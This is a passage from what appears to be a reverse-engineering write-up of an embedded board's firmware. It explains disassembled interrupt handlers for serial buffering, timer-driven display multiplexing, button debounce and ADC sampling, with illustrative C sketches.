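static uint8_t  txbuf[TXBUF_SIZE]; /* 0xE4B8 */
static uint16_t tx_read  = 0;      /* 0xE0B4: read offset */
static uint16_t tx_write = 0;      /* 0xE0B6: write offset */
static uint8_t  sio10;             /* stand-in for the SIO10 TX register */

static void intst1_handler(void)
{
    if (tx_read == tx_write)       /* nothing pending: just return */
        return;
    sio10 = txbuf[tx_read];        /* next byte into the TX register */
    tx_read++;
    if (tx_read >= TXBUF_SIZE)     /* wrap the offset back to 0 */
        tx_read = 0;
}
```

Code elsewhere fills `txbuf` and advances the write offset; the interrupt drains it a byte at a time.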

We can then go through all of the other UART/serial functions and identify potential transmit/receive buffers.

Interestingly, INTST0 and INTST2 are just RETI instructions. Why do these not require a transmit empty interrupt handler? Is it handled in software elsewhere?

The next handler that stands out from the others is INTTM00. This is the timer interrupt for timer 0 which will fire when the timer hits a certain value.

// INTTM00        
	02000        c1          PUSH            AX
	02001        c3          PUSH            BC
	02002        c7          PUSH            HL
	02003        aefc        MOVW            AX,0FFFFCH
	02005        c1          PUSH            AX
	02006        a0b3f6      INC             !0F6B3H
	02009        8fb3f6      MOV             A,!0F6B3H
	0200c        5c03        AND             A,#3H
	0200e        4c03        CMP             A,#3H
	02010        df38        BNZ             $204AH
		02012        a0b4f6      INC             !0F6B4H
		02015        fcfc2801    CALL            !!128FCH
		02019        fc932601    CALL            !!12693H
		0201d        fcf22701    CALL            !!127F2H
		02021        f45c        CLRB            0FFE5CH

		02023        fc132a01    CALL            !!12A13H // 7SEG display
		02027        fcaa3201    CALL            !!132AAH // Buttons

		0202b        8fb4f6      MOV             A,!0F6B4H
		0202e        5c03        AND             A,#3H
		02030        dd08        BZ              $203AH
		02032        91          DEC             A
		02033        dd0b        BZ              $2040H
		02035        91          DEC             A
		02036        dd0e        BZ              $2046H
		02038        ef10        BR              $204AH
		0203a        fccbff00    CALL            !!0FFCBH // Analog
		0203e        ef0a        BR              $204AH
		02040        fcd13101    CALL            !!131D1H
		02044        ef04        BR              $204AH
		02046        fc063301    CALL            !!13306H
	0204a        fc742e01    CALL            !!12E74H
	0204e        fc84ff00    CALL            !!0FF84H
	02052        72          MOV             C,A
	02053        81          INC             A
	02054        dd24        BZ              $207AH
        02056        62          MOV             A,C
        02057        70          MOV             X,A
        02058        f1          CLRB            A
        02059        01          ADDW            AX,AX
        0205a        04b8f5      ADDW            AX,#0F5B8H
        0205d        16          MOVW            HL,AX
        0205e        f6          CLRW            AX
        0205f        b1          DECW            AX
        02060        bb          MOVW            [HL],AX
        02061        62          MOV             A,C
        02062        d1          CMP0            A
        02063        dd11        BZ              $2076H
        02065        2c11        SUB             A,#11H
        02067        dd05        BZ              $206EH
        02069        91          DEC             A
        0206a        dd06        BZ              $2072H
        0206c        ef0c        BR              $207AH
        0206e        e46a        ONEB            0FFE6AH
        02070        ef08        BR              $207AH
        02072        e46b        ONEB            0FFE6BH
        02074        ef04        BR              $207AH
        02076        fcf7fc00    CALL            !!0FCF7H
        0207a        c0          POP             AX
	0207b        befc        MOVW            0FFFFCH,AX
	0207d        c6          POP             HL
	0207e        c2          POP             BC
	0207f        c0          POP             AX

This looks like it is fired periodically. A number of counters are used so that portions of the subroutine are only run now and then.
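The counter arrangement can be sketched as follows. This is my reading of the listing, not the firmware's code: 0xF6B3 gates the slow work to every fourth interrupt, and 0xF6B4 round-robins three tasks (the task names are placeholders for the calls to !!0FFCBH, !!131D1H and !!13306H).

```c
#include <stdint.h>

/* Sketch of the prescaler pattern in INTTM00. */
static uint8_t tick;       /* stand-in for 0xF6B3 */
static uint8_t slow_tick;  /* stand-in for 0xF6B4 */
static int calls[3];       /* instrumentation for this sketch only */

static void task_analog(void) { calls[0]++; }  /* !!0FFCBH */
static void task_131d1(void)  { calls[1]++; }  /* !!131D1H */
static void task_13306(void)  { calls[2]++; }  /* !!13306H */

static void inttm00(void)
{
    tick++;
    if ((tick & 3) != 3)           /* slow work only every 4th interrupt... */
        return;
    slow_tick++;
    /* 7-seg refresh and button scan would run here on every slow tick */
    switch (slow_tick & 3) {       /* ...and these three round-robin */
    case 0: task_analog(); break;
    case 1: task_131d1();  break;
    case 2: task_13306();  break;
    default: break;                /* value 3: nothing extra */
    }
}
```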

There are a lot of calls, and if we look at them we can clearly identify their function:

// Suspect from IO this is output to 7 seg
	12a13        d45d        CMP0            0FFE5DH
	12a15        f1          CLRB            A
	12a16        61f8        SKNZ            
	12a18        e1          ONEB            A
	12a19        9d5d        MOV             0FFE5DH,A
	12a1b        d45d        CMP0            0FFE5DH
	12a1d        dd24        BZ              $12A43H
	12a1f        8f46f6      MOV             A,!0F646H
	12a22        d448        CMP0            0FFE48H
	12a24        dd0a        BZ              $12A30H
	12a26        36b4f6      MOVW            HL,#0F6B4H
	12a29        31d50e      BF              [HL].5H,$12A3AH
	12a2c        51ff        MOV             A,#0FFH
	12a2e        ef0a        BR              $12A3AH
	12a30        d446        CMP0            0FFE46H
	12a32        dd06        BZ              $12A3AH
	12a34        36b4f6      MOVW            HL,#0F6B4H
	12a37        31f3f2      BT              [HL].7H,$12A2CH
	12a3a        712305      CLR1            P5.2H // These are the common cathodes
	12a3d        713205      SET1            P5.3H
	12a40        9d06        MOV             P6,A // P6 is the 7SEG
	12a42        d7          RET       

	12a43        8f47f6      MOV             A,!0F647H
	12a46        d449        CMP0            0FFE49H
	12a48        dd0a        BZ              $12A54H
	12a4a        36b4f6      MOVW            HL,#0F6B4H
	12a4d        31d50e      BF              [HL].5H,$12A5EH
	12a50        51ff        MOV             A,#0FFH
	12a52        ef0a        BR              $12A5EH
	12a54        d447        CMP0            0FFE47H
	12a56        dd06        BZ              $12A5EH
	12a58        36b4f6      MOVW            HL,#0F6B4H
	12a5b        31f3f2      BT              [HL].7H,$12A50H
	12a5e        712205      SET1            P5.2H // common cathodes flip
	12a61        713305      CLR1            P5.3H
	12a64        9d06        MOV             P6,A
	12a66        d7          RET   

From the IO, we can see this is likely to be updating the 7 segment LED displays.

The method used – of setting one common cathode, then the segments for that half, then the other common cathode, then the segments for that half – means that this needs to be called relatively frequently otherwise flicker will be detected by the eye.
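The multiplexing scheme can be sketched like this. It's an illustration of the technique rather than the firmware's exact code – the port bits match the disassembly (P5.2/P5.3 common cathodes, P6 segments), but the phase flag and digit array are my stand-ins.

```c
#include <stdint.h>

/* Sketch of multiplexed 7-segment refresh: each call lights one half
   of the display by pulling its common cathode low and putting that
   digit's segment pattern on P6; the next call does the other half. */
static uint8_t p5;        /* bit 2 and bit 3 = common cathodes */
static uint8_t p6;        /* segment outputs */
static uint8_t digit[2];  /* segment patterns, e.g. from 0xF646/0xF647 */
static uint8_t phase;     /* which half is lit this call */

static void sevenseg_refresh(void)
{
    phase ^= 1;
    if (phase == 0) {
        p5 &= ~(1u << 2);  /* CLR1 P5.2: enable first digit */
        p5 |=  (1u << 3);  /* SET1 P5.3: disable second digit */
        p6  = digit[0];
    } else {
        p5 |=  (1u << 2);  /* and the reverse for the other half */
        p5 &= ~(1u << 3);
        p6  = digit[1];
    }
}
```

Because only one digit is ever lit at a time, this has to be called at well over 50Hz per digit or the display visibly flickers – which is why it lives in the timer interrupt.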

// Button detection and debounce?
	132aa        31220217    BT              P2.2H,$132C5H // Button A
		132ae        4029e0ff    CMP             !0E029H,#0FFH
		132b2        dd24        BZ              $132D8H
		132b4        a029e0      INC             !0E029H
		132b7        4029e007    CMP             !0E029H,#7H
		132bb        df1b        BNZ             $132D8H
		132bd        cf29e0ff    MOV             !0E029H,#0FFH
		132c1        e445        ONEB            0FFE45H
		132c3        ef13        BR              $132D8H
	132c5        d529e0      CMP0            !0E029H
	132c8        dd0e        BZ              $132D8H
	132ca        b029e0      DEC             !0E029H
	132cd        4029e0f8    CMP             !0E029H,#0F8H
	132d1        df05        BNZ             $132D8H
	132d3        f529e0      CLRB            !0E029H
	132d6        f445        CLRB            0FFE45H

	132d8        31320216    BT              P2.3H,$132F2H // Button B
		132dc        402ae0ff    CMP             !0E02AH,#0FFH
		132e0        dd23        BZ              $13305H
		132e2        a02ae0      INC             !0E02AH
		132e5        402ae007    CMP             !0E02AH,#7H
		132e9        df1a        BNZ             $13305H
		132eb        cf2ae0ff    MOV             !0E02AH,#0FFH
		132ef        e444        ONEB            0FFE44H
		132f1        d7          RET             
	132f2        d52ae0      CMP0            !0E02AH
	132f5        dd0e        BZ              $13305H
	132f7        b02ae0      DEC             !0E02AH
	132fa        402ae0f8    CMP             !0E02AH,#0F8H
	132fe        df05        BNZ             $13305H
	13300        f52ae0      CLRB            !0E02AH
	13303        f444        CLRB            0FFE44H
	13305        d7          RET 

Again, from the IO, we can see that the buttons are being polled. There are also some counters changing – probably debounce.
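The counter behaviour for one button can be sketched in C. This follows my reading of the disassembly – the counter at 0xE029 ramps up while the pin reads pressed, saturates to 0xFF and sets the flag at 0xFFE45 after 7 consecutive samples, then ramps back down and clears both on release. Names are mine.

```c
#include <stdint.h>

/* Sketch of the per-button debounce counter seen in the listing. */
static uint8_t counter;  /* stand-in for 0xE029 */
static uint8_t pressed;  /* stand-in for flag 0xFFE45 */

static void debounce_button(int pin_low)  /* active-low button input */
{
    if (pin_low) {                    /* button held down */
        if (counter == 0xFF) return;  /* already latched as pressed */
        if (++counter == 7) {         /* 7 consecutive pressed samples */
            counter = 0xFF;
            pressed = 1;
        }
    } else {                          /* button released */
        if (counter == 0) return;
        if (--counter == 0xF8) {      /* 7 released samples after a latch */
            counter = 0;
            pressed = 0;
        }
    }
}
```

A glitch shorter than 7 samples moves the counter but never flips the flag, which is the point of the debounce.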

// Analog something or other
	0ffcb        f1          CLRB            A
	0ffcc        71042a      MOV1            CY,0FFE2AH.0H
	0ffcf        7189        MOV1            A.0H,CY
	0ffd1        70          MOV             X,A
	0ffd2        f1          CLRB            A
	0ffd3        710ce3      MOV1            CY,ADIF
	0ffd6        61dc        ROLC            A,1
	0ffd8        6158        AND             A,X
	0ffda        dd23        BZ              $0FFFFH
	0ffdc        710be3      CLR1            ADIF
	0ffdf        4031ff07    CMP             !ADS,#7H
	0ffe3        8d1f        MOV             A,ADCRH
	0ffe5        df0b        BNZ             $0FFF2H
	0ffe7        9f0af6      MOV             !0F60AH,A
	0ffea        717b30      CLR1            ADCS
	0ffed        ce3106      MOV             ADS,#6H
	0fff0        ef09        BR              $0FFFBH
	0fff2        9f0bf6      MOV             !0F60BH,A
	0fff5        717b30      CLR1            ADCS
	0fff8        ce3107      MOV             ADS,#7H
	0fffb        00          NOP             
	0fffc        717a30      SET1            ADCS
	0ffff        d7          RET     

This does something with one of the ADC inputs. I’ve not seen anything of interest that uses analog yet, so I’ll not look into this further for now. It could be the input voltage (the board can alarm on this) or the PSTN line voltage.

There aren’t many other clearly identifiable subroutines, but these few give me confidence that this interrupt handler is mostly handling periodic IO.

This program structure – servicing time-sensitive IO from a timer interrupt – is fairly common in embedded systems. It means that IO is serviced regularly, allowing more time-consuming (or non-deterministic) processing to happen outside of the interrupt in the main code. It also means there are a lot of buffers and global variables used to pass data back and forth, which we can look at and play with.

From a security perspective, it can also cause problems. If we can stall something in the timer interrupt – via buffer overflow, bad input and so on – it may be possible to lock up the device. I’d hope that the board uses a watchdog timer to recover from this, though.